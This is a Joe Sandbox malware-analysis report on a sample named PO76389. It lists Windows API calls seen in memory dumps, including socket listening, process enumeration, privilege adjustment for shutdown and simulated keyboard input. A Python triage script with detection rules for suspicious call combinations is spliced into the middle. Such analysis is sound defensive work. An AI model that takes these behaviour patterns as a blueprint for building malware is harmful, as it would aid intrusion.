                                                    • NULL Pointer assignment, xrefs: 0050C85D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: e75cee8e944e34e70a9b96c083f65e59623366f307c53c05b3efbdc039161862
                                                    • Instruction ID: a0d5535c139221a472084471972c21361eeadbb1e0009f097498e3478a6244fc
                                                    • Opcode Fuzzy Hash: e75cee8e944e34e70a9b96c083f65e59623366f307c53c05b3efbdc039161862
                                                    • Instruction Fuzzy Hash: 0C914771D00218ABDB10DFA5DC81ADEBFB9FF09710F20815AF519A7291EB705A44CFA4
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005024F6
                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00502526
                                                    • _wcscmp.LIBCMT ref: 0050253A
                                                    • _wcscmp.LIBCMT ref: 00502555
                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005025F3
                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00502609
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: 54813a600176d830bfffc1f8abf35dca3d380bd9a389213cb51a97fea23f789e
                                                    • Instruction ID: 3176e5940e2baa78d0bb91693c141bd539502a672bb83c93fba39b0591d97afb
                                                    • Opcode Fuzzy Hash: 54813a600176d830bfffc1f8abf35dca3d380bd9a389213cb51a97fea23f789e
                                                    • Instruction Fuzzy Hash: 31418D7190021AAFCF14DFA5CC99AEEBFB4FF15304F10045AE815A62D0EB359A84DFA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-1546025612
                                                    • Opcode ID: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                    • Instruction ID: 868063e6f45a507c8fa548dfebc5855dda844606c3c661c388e026c4caff59f1
                                                    • Opcode Fuzzy Hash: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                    • Instruction Fuzzy Hash: C7927D71E0021ACBDF24DF58C8407EEBBB1BB54314F1485AAD916AB380D7789D81DF65
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 4643a1dbfdc4c5659afd3a58a2f47ee7db386296daf68bbc70e27a65707b7102
                                                    • Instruction ID: b6c14757cf1e5cc0df801acc53e2ed6058c64c4425d292f4e00c963bdd702697
                                                    • Opcode Fuzzy Hash: 4643a1dbfdc4c5659afd3a58a2f47ee7db386296daf68bbc70e27a65707b7102
                                                    • Instruction Fuzzy Hash: 1A129E70A00619EBDF04DFA5D981AEEB7F9FF48304F20456EE406E7290EB399911CB65
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • ReleaseCapture.USER32 ref: 0051EB1A
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0051EBC2
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0051EBD5
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0051ECAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 973565025-2107944366
                                                    • Opcode ID: b28cb7cb893ef359d6c32febc0cd4c3634abbe347e93db8cd3fbcbf8ceabfb9e
                                                    • Instruction ID: ea5f7689e7f70341610a9a98ba5a90c045e73b94c545303159e06a1716119b27
                                                    • Opcode Fuzzy Hash: b28cb7cb893ef359d6c32febc0cd4c3634abbe347e93db8cd3fbcbf8ceabfb9e
                                                    • Instruction Fuzzy Hash: 44517A31104304AFE700EF24DC96FAA7BF5BB88708F10492DF955962A2DB749948EB66
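The API lines in these records share one shape: a bullet, an optional `Part of subcall function ADDR:` prefix, `Name.MODULE(args)` and a `ref:` address in code order, followed later by a `String ID:` line with `$`-separated strings and a closing `Instruction Fuzzy Hash:` line. The Python script below is an added example and not part of the Joe Sandbox report: it parses records in that shape and flags the call combinations this sample exhibits, the DACL rewrite on a user object (GetUserObjectSecurity, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity), DeleteFileW inside a FindFirstFileW/FindNextFileW loop, RegConnectRegistryW followed by RegQueryValueExW, and AdjustTokenPrivileges before ExitWindowsEx together with the SeShutdownPrivilege string. The rule names, the `Record` and `triage` helpers and the address-ordering check are assumptions made here; the sample text is a constructed, trimmed copy of records on this page.

```python
"""Triage helper for Joe Sandbox "Executed Functions" records (added example).

Record lines: "• Name.MODULE(args), ref: ADDR", optionally prefixed with
"Part of subcall function ADDR:", then "• String ID: a$b$c", then
"• Instruction Fuzzy Hash: ...". Rule names here are assumptions.
"""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")
RECORD_END = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")


@dataclass
class Record:
    calls: list = field(default_factory=list)    # (name, module, ref, sub)
    strings: list = field(default_factory=list)

    def names(self):
        return {name for name, _, _, _ in self.calls}

    def ref(self, name):
        # Address of the first direct (non-subcall) call to name, else None.
        for n, _, addr, sub in self.calls:
            if n == name and sub is None:
                return int(addr, 16)
        return None


def parse_records(text):
    records, cur = [], Record()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            cur.calls.append((m["name"], m["module"], m["ref"], m["sub"]))
        elif m := STRING_LINE.match(line):
            cur.strings = [s for s in m["strings"].split("$") if s.strip()]
        elif RECORD_END.match(line):
            if cur.calls or cur.strings:
                records.append(cur)
            cur = Record()
    if cur.calls or cur.strings:   # last record of a report cut off early
        records.append(cur)
    return records


# (rule, APIs that must all appear in one record, string that must appear)
RULES = [
    ("dacl_rewrite", {"GetUserObjectSecurity", "AddAce",
                      "SetSecurityDescriptorDacl", "SetUserObjectSecurity"}, None),
    ("recursive_delete", {"FindFirstFileW", "DeleteFileW", "FindNextFileW"}, None),
    ("remote_registry_access", {"RegConnectRegistryW", "RegQueryValueExW"}, None),
    ("privileged_shutdown", {"AdjustTokenPrivileges", "ExitWindowsEx"},
     "SeShutdownPrivilege"),
]


def triage(text):
    """Return (record index, rule) for every rule a record satisfies."""
    findings = []
    for idx, rec in enumerate(parse_records(text)):
        names = rec.names()
        for rule, required, needed_string in RULES:
            if required <= names and (needed_string is None
                                      or needed_string in rec.strings):
                findings.append((idx, rule))
        # ref: addresses follow code order, so DeleteFileW sitting between
        # FindFirstFileW and FindNextFileW runs once per enumerated match.
        first, delete, nxt = (rec.ref(n) for n in
                              ("FindFirstFileW", "DeleteFileW", "FindNextFileW"))
        if None not in (first, delete, nxt) and first < delete < nxt:
            findings.append((idx, "delete_inside_enum_loop"))
    return findings


# Constructed sample: trimmed copies of four records from this report.
SAMPLE = r"""
  • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB49A
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB54C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB560
• String ID:
• Instruction Fuzzy Hash: A8515A71900249ABCF04DFA2DC48AEFBB79FF04745F04811AF911A63A1DB389A05DFA4
• FindFirstFileW.KERNEL32(?,?), ref: 004F6EAE
• DeleteFileW.KERNEL32(?), ref: 004F6F0E
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6F22
• String ID: \*.*
• Instruction Fuzzy Hash: 0F21C5B2408348AAC310EBA4D8559EBBBEC9F59214F044E5FF5D4C3252EA38D64DC776
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051317F
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0051321E
• String ID:
• Instruction Fuzzy Hash: 82E16B35204200AFDB14DF25C894E6ABBF9FF88724B04896EF44ADB261DB35ED45CB51
  • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
  • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
• ExitWindowsEx.USER32(?,00000000), ref: 004F830C
• String ID: $@$SeShutdownPrivilege
"""
```

Running `triage(SAMPLE)` yields one finding per record here (the delete record gets two, the set rule and the ordering rule). These combinations also occur in ordinary runtime and library code (a delete-directory helper, a shutdown helper), so a hit marks a function to read in the disassembly, not a verdict; the ordering check on `ref:` addresses is what separates a one-off DeleteFileW from a delete that runs once per FindNextFileW match.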
                                                    APIs
                                                      • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                      • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                      • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 004F830C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                    • Instruction ID: 85444b7e366aa48d161b2e21392ca873de1298c1ba092ac57bf2a68a371d615f
                                                    • Opcode Fuzzy Hash: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                    • Instruction Fuzzy Hash: F101FC71B40319ABE76816788C4BBBB3668DB00F84F14042EFF03DA2E1DE595C0181AC
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00509235
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509244
                                                    • bind.WS2_32(00000000,?,00000010), ref: 00509260
                                                    • listen.WS2_32(00000000,00000005), ref: 0050926F
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509289
                                                    • closesocket.WS2_32(00000000), ref: 0050929D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 521bd4ff449022acc91b69b2de2f52eb39187c56b87af7dc23f66ef3692ab240
                                                    • Instruction ID: 86b93d47a7baf546090b223f8279b67eeb3b1a07e1cd57a0f76b80743cfd630a
                                                    • Opcode Fuzzy Hash: 521bd4ff449022acc91b69b2de2f52eb39187c56b87af7dc23f66ef3692ab240
                                                    • Instruction Fuzzy Hash: AF218D39600201AFCB00EF64D885B6EBBB9FF44724F108119F956AB3D2CB74AD45DB61
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004F6FAC
                                                    • __wsplitpath.LIBCMT ref: 004F6FD0
                                                    • _wcscat.LIBCMT ref: 004F6FE3
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                    • String ID:
                                                    • API String ID: 1605983538-0
                                                    • Opcode ID: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                    • Instruction ID: 15368c93121fd84bacccbb3a9f4fb28405a045fda4044a57a1857885731b4f74
                                                    • Opcode Fuzzy Hash: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                    • Instruction Fuzzy Hash: 352156B1904219AFDB10ABA0DC88BEEB7BDAF54304F1004DAF605D3241EB799F84DB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: hNV$tMV
                                                    • API String ID: 4104443479-474198503
                                                    • Opcode ID: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                    • Instruction ID: 754537382ba19b40e01ec1e93d765c2634e2aff81c285b378ee288cd72a75451
                                                    • Opcode Fuzzy Hash: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                    • Instruction Fuzzy Hash: 2CA22875D01219CFCB24CF58C8806EDBBB1FF49314F2581AAE859AB390D7789D82DB64
                                                    APIs
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • _memmove.LIBCMT ref: 00523020
                                                    • _memmove.LIBCMT ref: 00523135
                                                    • _memmove.LIBCMT ref: 005231DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: 332aa97e83c006c9d5e1b4954d9572f28bb8815d008de03900b417a0db236e9a
                                                    • Instruction ID: 1d543e0fc2cdbb8fb21e76e73df1e9d47b47aebfc330fc21ed50ced0a21e009e
                                                    • Opcode Fuzzy Hash: 332aa97e83c006c9d5e1b4954d9572f28bb8815d008de03900b417a0db236e9a
                                                    • Instruction Fuzzy Hash: 6F02A370A00115DBCF04DF69D981AAEBBB5FF45300F14806EE806DB395EB39DA15CBA5
                                                    APIs
                                                      • Part of subcall function 0050ACD3: inet_addr.WS2_32(00000000), ref: 0050ACF5
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0050973D
                                                    • WSAGetLastError.WS2_32(00000000,00000000), ref: 00509760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: 79726f1c1b31a0fdee280e49ec844a6b7b83a52d44ac555334b1899ef8285483
                                                    • Instruction ID: 5c1f638eef09198cfba0a76c099d2a5ad2956d5dd2e6d7b7b3808682a87eabfe
                                                    • Opcode Fuzzy Hash: 79726f1c1b31a0fdee280e49ec844a6b7b83a52d44ac555334b1899ef8285483
                                                    • Instruction Fuzzy Hash: C641E474600200AFDB14AF25CC82F6E77EDEF44728F14845EF955AB392DA789D018BA5
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FF37A
                                                    • _wcscmp.LIBCMT ref: 004FF3AA
                                                    • _wcscmp.LIBCMT ref: 004FF3BF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004FF3D0
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004FF3FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 398f2d8427a8997ec6ae36f0adf7550247321cbe520faffdbf46139603d1a41f
                                                    • Instruction ID: 73736d6ee00e0892736191b05a4b6c5b610c15b3b2f85be58e4cd8c02cc0d663
                                                    • Opcode Fuzzy Hash: 398f2d8427a8997ec6ae36f0adf7550247321cbe520faffdbf46139603d1a41f
                                                    • Instruction Fuzzy Hash: 4D41C0356043029FC704DF29C490EAAB3E4FF49328F10416EEA59CB3A1DB79A945CB99
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004F439C
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 004F43B8
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004F4425
                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004F4483
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
